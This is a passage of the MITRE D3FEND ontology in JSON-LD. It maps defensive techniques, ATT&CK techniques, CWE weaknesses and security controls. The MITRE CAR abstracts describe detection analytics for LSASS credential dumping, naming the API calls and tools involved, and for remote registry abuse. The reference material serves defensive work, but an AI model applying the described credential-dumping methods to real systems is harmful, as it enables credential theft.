      "d3f:definition": "Runtime variables  which may consist of memory usage, internal temperature, operating mode, clock time, scan time, hardware status, etc.",
      "d3f:synonym": [
        "Configuration Resource",
        "System Data",
        "System Properties",
        "System Variable"
      ],
      "rdfs:label": "System Platform Variable",
      "rdfs:seeAlso": [
        {
          "@id": "https://literature.rockwellautomation.com/idc/groups/literature/documents/pm/1756-pm015_-en-p.pdf"
        },
        {
          "@id": "https://www.nrc.gov/docs/ml0932/ml093290422.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:QueryByCommittee",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-QBC",
      "d3f:definition": "Query by Committee (QBC) takes inspiration from ensemble methods. Instead of just one classifier, it takes into account the decision of a committee C=ℎ1,…,ℎc of classifiers ℎi. Each classifier has the same target classes, but a different underlying model or a different view on the data.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Query By Committee",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-14_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Session Audit | Capture and Record Content",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-14(2)"
    },
    {
      "@id": "d3f:Reference-CAR-2020-05-001%3AMiniDumpOfLSASS_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-05-001/"
      },
      "d3f:kb-abstract": "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call MiniDumpWriteDump. Tools like SafetyKatz, SafetyDump, and Outflank-Dumpert default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.\n\nThe analytic is based on a Sigma analytic contributed by Samir Bousseaden and written up in a blog on MENASEC. It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in CAR-2019-08-001. In this iteration of the Sigma analytic, the GrantedAccess filter isn’t included because it didn’t seem to filter out any false positives and introduces the potential for evasion.\n\nThis analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-05-001: MiniDump of LSASS",
      "rdfs:label": "Reference - CAR-2020-05-001: MiniDump of LSASS - MITRE"
    },
    {
      "@id": "d3f:AllocateMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Allocate Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nba358e6f796f4625b5587c4f978e6abb"
        }
      ]
    },
    {
      "@id": "_:Nba358e6f796f4625b5587c4f978e6abb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1082",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1082",
      "d3f:definition": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": {
        "@id": "d3f:DecoyArtifact"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "System Information Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N0a1db89f32964ce6b6ceba2a1e57eb3c"
        },
        {
          "@id": "_:N533d909103d44cc58e5f4dbf805fd69a"
        }
      ]
    },
    {
      "@id": "_:N0a1db89f32964ce6b6ceba2a1e57eb3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DecoyArtifact"
      }
    },
    {
      "@id": "_:N533d909103d44cc58e5f4dbf805fd69a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-26",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-26",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/dir/../filename\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '/dir/../filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Reference-GuideToOTSecurity",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/pubs/sp/800/82/r3/final"
      },
      "d3f:kb-abstract": "This document provides guidance on how to secure operational technology (OT) while addressing their unique performance, reliability, and safety requirements. OT encompasses a broad range of programmable systems and devices that interact with the physical environment (or manage devices that interact with the physical environment). These systems and devices detect or cause a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial control systems, building automation systems, transportation systems, physical access control systems, physical environment monitoring systems, and physical environment measurement systems. The document provides an overview of OT and typical system topologies, identifies common threats and vulnerabilities to these systems, and provides recommended security countermeasures to mitigate the associated risks.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ChangeDefaultPassword"
        },
        {
          "@id": "d3f:PhysicalEnclosureHardening"
        },
        {
          "@id": "d3f:PhysicalLocking"
        },
        {
          "@id": "d3f:UserGroupPermissions"
        }
      ],
      "d3f:kb-reference-title": "Guide to Operational Technology (OT) Security",
      "rdfs:label": "Reference - NIST SP 800-82R3 Guide to Operational Technology (OT) Security, Section 6.2.1.4.5 Password Authentication"
    },
    {
      "@id": "d3f:SSHListenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that an SSH server has started listening for incoming connection requests, enabling potential clients to initiate secure sessions.",
      "rdfs:label": "SSH Listen Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionListenEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002016_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification-I (PIV-I) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002016"
    },
    {
      "@id": "d3f:NetworkResourceAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkResourceAccessMediation"
      ],
      "d3f:d3fend-id": "D3-NRAM",
      "d3f:definition": "Control of access to organizational systems and services by users or processes over a network.",
      "d3f:isolates": {
        "@id": "d3f:NetworkResource"
      },
      "d3f:kb-article": "## How it works\n\nNetwork Resource Access Control involves managing and regulating access to resources within an organization's network. This includes ensuring that only authorized users or processes can access specific systems or data, often through authentication and authorization mechanisms. Examples include accessing internal databases, file servers, or application services.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:synonym": "Remote Access Control",
      "rdfs:label": "Network Resource Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Nb443976bfa97411b94d20f94f75060b4"
        }
      ]
    },
    {
      "@id": "_:Nb443976bfa97411b94d20f94f75060b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:T1601.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601.002",
      "d3f:definition": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Downgrade System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1601"
      }
    },
    {
      "@id": "d3f:DS0002",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A profile representing a user, device, service, or application used to authenticate and access resources",
      "d3f:exactly": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the User Account Metadata component",
      "rdfs:label": "User Account (ATT&CK DS)"
    },
    {
      "@id": "d3f:ExternalControlThing",
      "@type": "owl:Class",
      "rdfs:label": "External Control Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:ApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application process is an instance of an application computer program that is being executed.",
      "d3f:runs": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Application Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Application_software"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserProcess"
        },
        {
          "@id": "_:Ne1b2e2ead332469b88778b71030d6fbc"
        }
      ]
    },
    {
      "@id": "_:Ne1b2e2ead332469b88778b71030d6fbc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:AdobePDFFile1.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "d3f:may-contain": {
        "@id": "d3f:JavascriptFile"
      },
      "rdfs:label": "Adobe PDF File 1.3"
    },
    {
      "@id": "d3f:CCI-000198_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces minimum password lifetime restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000198"
    },
    {
      "@id": "d3f:ComputerPlatform",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:OperatingSystem"
        },
        {
          "@id": "d3f:SystemPlatformVariable"
        }
      ],
      "d3f:definition": "Platform includes the hardware and OS. The term computing platform can refer to different abstraction levels, including a certain hardware architecture, an operating system (OS), and runtime libraries. In total it can be said to be the stage on which computer programs can run.",
      "d3f:synonym": "Computing Platform",
      "rdfs:label": "Computer Platform",
      "rdfs:seeAlso": {
        "@id": "dbr:Computing_platform"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nbee7ffa6f28747d5b6769da9e873e47d"
        },
        {
          "@id": "_:Na8b1d54d241a42f9a12e22f33b83934f"
        },
        {
          "@id": "_:Ne6af679f40fc45b6b026577c20ba57e5"
        },
        {
          "@id": "_:N8323548c58e440d29b450fa859718b38"
        }
      ]
    },
    {
      "@id": "_:Nbee7ffa6f28747d5b6769da9e873e47d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "_:Na8b1d54d241a42f9a12e22f33b83934f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "_:Ne6af679f40fc45b6b026577c20ba57e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "_:N8323548c58e440d29b450fa859718b38",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:T1635.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1635.001",
      "d3f:definition": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.",
      "rdfs:label": "URI Hijacking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1635"
      },
      "skos:prefLabel": "URI Hijacking"
    },
    {
      "@id": "d3f:DS0011",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries",
      "rdfs:comment": "This data source captures events relating to software libraries and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Module (ATT&CK DS)"
    },
    {
      "@id": "d3f:HypothesisTesting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HT",
      "d3f:definition": "A statistical hypothesis test is a method of statistical inference used to decide whether the data at hand sufficiently support a particular hypothesis. Hypothesis testing allows us to make probabilistic statements about population parameters.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical hypothesis testing. [Link](https://en.wikipedia.org/wiki/Statistical_hypothesis_testing)",
      "rdfs:label": "Hypothesis Testing",
      "rdfs:subClassOf": {
        "@id": "d3f:InferentialStatistics"
      }
    },
    {
      "@id": "d3f:CCI-002409_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system blocks both inbound and outbound communications traffic between organization-defined communication clients that are independently configured by end users and external service providers.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002409"
    },
    {
      "@id": "d3f:CWE-776",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-776",
      "d3f:definition": "The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.",
      "d3f:synonym": [
        "Billion Laughs Attack",
        "XEE",
        "XML Bomb"
      ],
      "rdfs:label": "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-405"
        },
        {
          "@id": "d3f:CWE-674"
        }
      ]
    },
    {
      "@id": "d3f:CWE-732",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-732",
      "d3f:definition": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.",
      "rdfs:label": "Incorrect Permission Assignment for Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0048.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.000",
      "d3f:definition": "Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.",
      "rdfs:label": "Financial Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Financial Harm"
    },
    {
      "@id": "d3f:PhysicalAccessAlarmEvent",
      "@type": "owl:Class",
      "rdfs:comment": "An event occuring when a physical threshold is crossed.",
      "rdfs:label": "Physical Access Alarm Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalEvent"
      }
    },
    {
      "@id": "d3f:OperatingSystemPackagingTool",
      "@type": "owl:Class",
      "d3f:definition": "A software packaging tool oriented on building a software package for a particular operating system (e.g. rpmbuild.)",
      "rdfs:label": "Operating System Packaging Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackagingTool"
      }
    },
    {
      "@id": "d3f:T1534",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1534",
      "d3f:definition": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)",
      "d3f:produces": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Internal Spearphishing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Nd4ade50866bc4b5e9f4665dc41c4f46c"
        }
      ]
    },
    {
      "@id": "_:Nd4ade50866bc4b5e9f4665dc41c4f46c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:T1428",
      "@type": "owl:Class",
      "d3f:attack-id": "T1428",
      "d3f:definition": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.",
      "rdfs:label": "Exploitation of Remote Services - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileLateralMovementTechnique"
      },
      "skos:prefLabel": "Exploitation of Remote Services"
    },
    {
      "@id": "d3f:CWE-627",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-627",
      "d3f:definition": "In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.",
      "d3f:synonym": "Dynamic evaluation",
      "rdfs:label": "Dynamic Variable Evaluation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-914"
      }
    },
    {
      "@id": "d3f:Reference-Intrusion_and_misuse_deterrence_system_employing_a_virtual_network",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7240368B1"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficSignatureAnalysis"
      },
      "d3f:kb-reference-title": "Intrusion and misuse deterrence system employing a virtual network",
      "rdfs:label": "Reference - Intrusion and misuse deterrence system employing a virtual network"
    },
    {
      "@id": "d3f:NetworkSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network session is a temporary and interactive information interchange between two or more devices communicating over a network. A session is established at a certain point in time, and then 'torn down' - brought to an end - at some later point. An established communication session may involve more than one message in each direction. A session is typically stateful, meaning that at least one of the communicating parties needs to hold current state information and save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses. Network sessions may be established and implemented as part of protocols and services at the application, session, or transport layers of the OSI model.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Session",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:OSI_model"
        },
        {
          "@id": "dbr:Session_(computer_science)"
        },
        {
          "@id": "https://schema.ocsf.io/objects/network_connection_info"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Session"
        },
        {
          "@id": "_:Nd70018da4d524df4ac2725217ad88e1b"
        }
      ]
    },
    {
      "@id": "_:Nd70018da4d524df4ac2725217ad88e1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:ApplicationInventorySensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects information on applications on an endpoint.",
      "d3f:monitors": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Application Inventory Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N057fb3801fda42339b727d462378b154"
        }
      ]
    },
    {
      "@id": "_:N057fb3801fda42339b727d462378b154",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:T1578.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.004",
      "d3f:definition": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.",
      "d3f:modifies": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "rdfs:label": "Revert Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N2e1dc35379db4d67a5b32929214ae3ef"
        },
        {
          "@id": "_:N64b180cc56b14f889ab2e3b43303ffab"
        }
      ]
    },
    {
      "@id": "_:N2e1dc35379db4d67a5b32929214ae3ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N64b180cc56b14f889ab2e3b43303ffab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:Sensor",
      "@type": "owl:Class",
      "d3f:definition": "In the broadest definition, a sensor is a device, module, machine, or subsystem that detects events or changes in its environment and sends the information to other electronics, frequently a computer.",
      "rdfs:label": "Sensor",
      "rdfs:seeAlso": [
        {
          "@id": "https://en.wikipedia.org/wiki/Sensor"
        },
        {
          "@id": "https://schema.ocsf.io/objects/agent"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ]
    },
    {
      "@id": "d3f:Network",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network is a group of computers that use a set of common communication protocols over digital interconnections for the purpose of sharing resources located on or provided by the network nodes. The interconnections between nodes are formed from a broad spectrum of telecommunication network technologies, based on physically wired, optical, and wireless radio-frequency methods that may be arranged in a variety of network topologies.",
      "rdfs:label": "Network",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/03826490-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Computer Network"
    },
    {
      "@id": "d3f:CCI-001352_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects the audit records of non-local accesses to privileged accounts and the execution of privileged functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001352"
    },
    {
      "@id": "d3f:RemoteAuthorizationService",
      "@type": "owl:Class",
      "d3f:definition": "A remote authorization service provides for the authorization of a user across a network (i.e., remotely).",
      "rdfs:label": "Remote Authorization Service",
      "rdfs:subClassOf": {
        "@id": "d3f:AuthorizationService"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCXFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCX File"
    },
    {
      "@id": "d3f:CWE-356",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-356",
      "d3f:definition": "The product's user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system.",
      "rdfs:label": "Product UI does not Warn User of Unsafe Actions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:T1566",
      "@type": "owl:Class",
      "d3f:attack-id": "T1566",
      "d3f:definition": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.",
      "rdfs:label": "Phishing",
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000888_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to protect the integrity and confidentiality of non-local maintenance and diagnostic communications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000888"
    },
    {
      "@id": "d3f:DISA_FSO",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Organization"
      ],
      "d3f:definition": "Defense Information Systems Agency (DISA) Field Security Office (FSO)",
      "rdfs:label": "DISA FSO"
    },
    {
      "@id": "d3f:WindowsDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Deletes an existing file.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtDeleteFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-deletefile"
      },
      "rdfs:label": "Windows DeleteFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIDeleteFile"
        },
        {
          "@id": "_:N4a5f77a4d00840088b021d2f57102fa8"
        }
      ]
    },
    {
      "@id": "_:N4a5f77a4d00840088b021d2f57102fa8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtDeleteFile"
      }
    },
    {
      "@id": "d3f:Reference-RemoteRegistry_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-005/"
      },
      "d3f:kb-abstract": "An adversary can remotely manipulate the registry of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a Lateral Movement technique, discover the configuration of a host, achieve Persistence, or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. Although this behavior is disabled in many Windows configurations, it is possible to remotely enable the RemoteRegistry service, which can be detected with CAR-2014-03-005.\n\nRemote access to the registry can be achieved via\n\n* Windows API function RegConnectRegistry\n* command line via reg.exe\n* graphically via regedit.exe\n\nAll of these behaviors call into the Windows API, which uses the NamedPipe WINREG over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-005: Remote Registry",
      "rdfs:label": "Reference - CAR-2014-11-005: Remote Registry - MITRE"
    },
    {
      "@id": "d3f:CCI-003123_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
